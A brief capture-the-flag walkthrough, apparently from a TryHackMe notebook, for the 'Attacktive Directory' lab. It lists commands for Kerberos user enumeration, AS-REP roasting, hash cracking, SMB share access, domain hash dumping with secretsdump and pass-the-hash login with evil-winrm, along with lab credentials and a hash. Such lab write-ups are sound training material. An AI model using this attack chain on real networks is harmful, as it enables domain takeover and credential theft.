Attacktive Directory

Information Gathering

sudo nmapAutomator.sh 10.10.237.39 all

Service Enumeration

Kerberos (Port 88)

kerbrute userenum -d spookysec.local userlist.txt --dc 10.10.237.39

With some vim magic, we remove any duplicate usernames and only extract the username portion.

Impacket has a tool called "GetNPUsers.py" (located in impacket/examples/GetNPUsers.py) that will allow us to query ASReproastable accounts from the Key Distribution Center. The only thing that's necessary to query accounts is a valid set of usernames which we enumerated previously via Kerbrute.

GetNPUsers.py spookysec.local/ -dc-ip 10.10.237.39 -usersfile valid_users.txt

Next, we can use john to try to crack the hash that we got for svc-admin account.

Now we have credentials for svc-admin. svc-admin:management2005

crackmapexec smb 10.10.237.39 -u 'svc-admin' -p 'management2005' --shares

Looks like we have read access to the backup share.

SMB (Port 139/445)

smbclient \\\\10.10.237.39\\backup -U svc-admin management2005

Exploit

secretsdump.py 'backup@10.10.237.39' -just-dc

evil-winrm -i 10.10.237.39 -u Administrator -H 0e363213e37b94221497260b0bcb4fc

PreviousTryHackMe PracticeNextRoasted

Last updated